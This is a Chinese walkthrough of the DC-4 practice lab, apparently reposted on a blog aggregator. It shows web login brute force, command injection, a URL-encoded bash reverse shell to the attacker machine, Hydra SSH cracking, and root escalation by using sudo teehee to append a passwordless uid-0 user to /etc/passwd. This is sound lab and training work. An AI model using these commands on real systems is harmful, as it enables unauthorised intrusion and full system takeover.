小H靶场笔记:DC-4

DC-4

January 4, 2024 2:37 PM
Tags: teehee提权
Owner:只惠摸鱼

信息收集

  • 探测靶机ip,发现应该是192.168.199.134

    在这里插入图片描述

  • 扫一下开放端口(22、80)、服务、版本、漏洞

    在这里插入图片描述

  • 根据扫描结果,在80端口可能有CSRF漏洞,可以尝试利用一下

    • OS为Linux3.2-4.9
  • 80端口开放,那先扫一下目录吧,发现没有什么

    在这里插入图片描述

漏洞利用

  • 那就看一下80端口吧,打开页面瞅一眼,很简洁,没有什么提示,尝试登录也是直接重定向了。

在这里插入图片描述

  • 那就BP抓包看一下吧,发现是POST请求,请求体有usernamepassword,请求头有cookie,尝试随即登录且不发送改变。

在这里插入图片描述

  • 尝试了万能密码没有效果,试一下爆破吧,盲猜账号为admin

    在这里插入图片描述

    • 我使用了我自己的收集的一个常用字典大概7.5k
    • 字典越好爆破的越快,(我设置了线程为1,防止服务崩溃【别问我怎么知道的】)
  • 爆破出了密码happy

    在这里插入图片描述

  • 使用admin,和happy登录,进入到页面

    在这里插入图片描述

  • 点击command,发现可以执行一些系统命令,抓包试试看

    在这里插入图片描述

  • 修改radio参数,发现可以成功执行系统命令

    在这里插入图片描述

  • 反弹shell给kali,方便做下一步提权操作

    • kali:nc -lvp 1234
    • 被控端:bash±c+'bash±i+>%26+/dev/tcp/192.168.199.129/1234+0>%261’
    • %26为&的url编码,不转码会和‘&’符号冲突。

    在这里插入图片描述

    在这里插入图片描述

  • 用户为普通用户,权限太低,查看目录,翻到home目录,发现有三个用户

    在这里插入图片描述

    • /home 在Linux中代表用户主目录

      在这里插入图片描述

      • 对一般用户,~表示/home/(用户名)
      • 对于root用户,~表示/root
  • 翻看用户目录,发现jim目录中有一个backups目录,且其中有一个密码字典

    在这里插入图片描述

  • 将字典复制到本地txt,直接尝试使用hydra爆破jim用户 ssh服务

    • Hydra是一款密码破解工具,可以用来破解各种网络应用程序的登录口令。 Hydra支持多种协议和服务,如FTP、SSH、Telnet、SMTP、POP3、IMAP、HTTP、LDAP、SMB等,可以使用字典攻击、暴力破解等方式进行密码破解

    在这里插入图片描述

  • 得到密码

    在这里插入图片描述

  • 登录ssh

    在这里插入图片描述

  • 尝试sudo -l 发现没有权限,权限太低,需要寻找其他用户

    在这里插入图片描述

  • 查看文件 发现有邮件,可以查看一下邮箱试试

    在这里插入图片描述

    • 邮件存储位置可以因系统而异,通常在**/var/spool/mail/var/mail**目录中
  • 查看邮箱中的邮件,发现charles的密码。

    在这里插入图片描述

  • 通过所给的密码尝试切换用户

    在这里插入图片描述

提权

  • sudo -l查看无需密码的指令(类似git提权)

    在这里插入图片描述

  • 发现有teehee,百度了查一下teehee提权方法

    • 输入指令创建raaj用户

      • echo “raaj::0:0:::/bin/bash” | sudo teehee -a /etc/passwd
    • 直接无密码登录raaj用户,得到root权限

      在这里插入图片描述

  • 进入/root目录得到flag!

    在这里插入图片描述

teehee提权

  • teehee是linux编辑器。在有sudo权限时,可以利用其来提权
  • 核心思路就是利用其在passwd文件中追加一条uid为0的用户条目
    • echo "hwhw::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
  • 按照linux用户机制,如果没有shadow条目,且passwd用户密码条目为空的时候,可以本地直接su空密码登录。所以只需要执行su hwhw就可以登录到hwhw用户,这个用户因为uid为0,所以也是root权限

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/596016.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

石头剪刀布游戏 - 华为OD统一考试

OD统一考试 分值: 100分 题解: Java / Python / C++ 题目描述 石头剪刀布游戏有 3 种出拳形状: 石头、剪刀、布。分别用字母 A,B,C 表示游戏规则: 出拳形状之间的胜负规则如下: A>B; B>C; C>A; 左边一个字母,表示相对优势形状。右边一个字母,表示相对劣势形状。…

Java里的Collections算法类

Collections算法类 Collections算法类里定义一系列用于操作集合的静态方法。 当谈到Java中的集合框架时,Collections 类是一个十分重要的类。它提供了一系列静态方法,用于操作和处理各种集合对象。 Java中的Collections类 Collections类是Java集合框架…

【SpringBoot系列】springboot中拦截器Interceptor使用

🤵‍♂️ 个人主页:@香菜的个人主页,加 ischongxin ,备注csdn ✍🏻作者简介:csdn 认证博客专家,游戏开发领域优质创作者,华为云享专家,2021年度华为云年度十佳博主 🐋 希望大家多多支持,我们一起进步!😄 如果文章对你有帮助的话, 欢迎评论 💬点赞👍🏻 收…

vue项目中axios拦截器配置及不同接口对应不同后端接口域名配置

vue项目中axios拦截器配置及不同接口对应不同后端接口域名配置 一、axios基础配置二、不同接口对应不同后端接口域名配置 一、axios基础配置 import axios from axios import store from /store import { Message } from element-ui //创建axios实例 const service axios.cre…

使用 express 实现反向代理,解决跨域问题

反向代理是对服务器的代理,可以使用 express 实现反向代理,很简单,具体代码请参考 彻底理解前端安全面试题(3)—— CORS跨域资源共享,解决跨域问题,建议收藏(含源码)-CS…

AI:108-基于深度学习的通信干扰抑制技术研究

🚀点击这里跳转到本专栏,可查阅专栏顶置最新的指南宝典~ 🎉🎊🎉 你的技术旅程将在这里启航! 从基础到实践,深入学习。无论你是初学者还是经验丰富的老手,对于本专栏案例和项目实践都有参考学习意义。 ✨✨✨ 每一个案例都附带有在本地跑过的关键代码,详细讲解供…

企语iFair 协同管理系统 任意文件读取漏洞复现(CVE-2023-47473)

0x01 产品简介 企语iFair协同管理系统是一款专业的协同办公软件,该管理系统兼容性强,适合多种企业类型。该软件永久免费,绿色安全,无需收取费用即可使用所有功能。企语iFair协同管理系统同时兼容了Linux、Windows两种操作系统 0x02 漏洞概述 企语iFair协同管理系统getup…

AE (4)_ 直方图调整的理论

#灵感# 在短暂的高通平台调试中,很看重直方图调整的理解。后来其它平台,不怎么调整这个了。但还是记录一下。 我个人还是倾向 招式简单,但应用到极致。 绝大部分内容来自:刘斯宁,Image Enhancement - CLAHE - 知乎 (z…

Mybatis源码基本原理--XML版

文章目录 mybatis是什么架构设计首先建立起Mapper的代理工程和代理映射器的注册和使用XML文件解析数据源解析、创建和使用SQL执行器(Executor)的定义与实现SQL解析参数处理器:策略模式实现封装处理结果注解 mybatis 是什么 MyBatis 是一款优…

SecOC中新鲜度值和MAC都按照完整的值来生成,但是在发送和认证的时候只会截取一部分。这边截取的部分一般取多长?由什么参数设定?

新鲜度值(Freshness Value, FV)和消息验证码(Message Authentication Code, MAC)是SecOC协议中用于保证数据的真实性和新鲜度的重要信息。它们的长度取决于不同的因素,如加密算法、安全级别、通信带宽等。 一般来说,FV和MAC的长度越长,安全性越高,但也会占用更多的通信…

IDEA 每次新建工程都要重新配置 Maven的解决方案

文章目录 IDEA 每次新建工程都要重新配置 Maven 解决方案一、选择 File -> New Projects Setup -> Settingsfor New Projects…二、选择 Build,Execution,Deployment -> Build Tools -> Maven IDEA 每次新建工程都要重新配置 Maven 解决方案 DEA 每次新建工程都要…

用大模型读取你的想法,并转化成文本!恐怖的DeWave模型

悉尼科技大学的科研人员,通过大语言模型、EEG(大脑活动检测工具)、脑机接口等技术,开发了一个可自动读取人类想法,并转化成文本的AI大模型——DeWave。 DeWave的使用方法非常简单,用户只需要戴上EEG&#…

vivo 互联网技术 2023 年度盘点

在龙年到来之际,vivo互联网技术2023年货如约而至,让我们一起盘点下vivo互联网技术在过去一年的成长与收获吧。 01 年度技术文章 2023年,vivo 互联网技术公众号共推送技术干货文章 70,我们根据文章阅读量等指标,精选出…

[书生·浦语大模型实战营]——书生·浦语大模型全链路开源体系

大模型成为发展通用人工智能的重要途径 书生浦语大模型开源历程 书生浦语模型性能 从模型到应用 应用例子:智能客服/个人助手/行业应用 实现流程: 开源开放体系: 1.数据——书生万卷 价值观对齐这个挺有意思嗷! 2.预训练工具…

docker容器添加新的端口映射

通常在运行容器时,我们都会通过参数 -p来指定宿主机和容器端口的映射,例如 docker run -it -d --restart always --name [指定容器名] -p 8899:8080 [指定镜像名]上述命令将容器内的8080端口映射到宿主机的8899端口。 参数说明 -d 表示后台运行容器 -t…

【51单片机系列】LCD1602液晶模块

本文是关于液晶显示屏的相关介绍。相对于静态数码管、动态数码管、LED点阵等,LCD1602液晶显示器能够显示更多的字符数字信息,并且也是常用的一种显示装置。 文章目录 一、LCD1602介绍1.1、LCD1602简介1.2、LCD1602常用指令1.3、LCD1602使用 二、LCD1602使…

openGauss学习笔记-174 openGauss 数据库运维-备份与恢复-导入数据-管理并发写入操作

文章目录 openGauss学习笔记-174 openGauss 数据库运维-备份与恢复-导入数据-管理并发写入操作174.1 事务隔离说明174.2 写入和读写操作174.3 并发写入事务的潜在死锁情况 openGauss学习笔记-174 openGauss 数据库运维-备份与恢复-导入数据-管理并发写入操作 174.1 事务隔离说…

SpringBoot之项目管理

系列文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 SpringBoot之项目管理 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 系列文章目录前言一、指标监控Sprin…

网络安全试题进阶——附答案

选择题 什么是CSRF攻击的全称? A. Cross-Site Request ForgeryB. Cross-Site ScriptingC. Credential Sniffing and Retrieval ForceD. Cyber Security and Risk Framework 哪种安全攻击利用用户的社交工程,诱使他们点击似乎是合法链接的恶意链接&#x…

Parallels虚拟机启动后,Mac主机无法上网怎么办

文章目录 1.问题2.解决: 1.问题 部分用户在运行Parallels Desktop的Windows 11打开后,Windows上网没有问题 ,但是Mac主机不能访问带域名的网站,而访问带ip的网站没问题,退出parallels虚拟机以后,mac网络恢…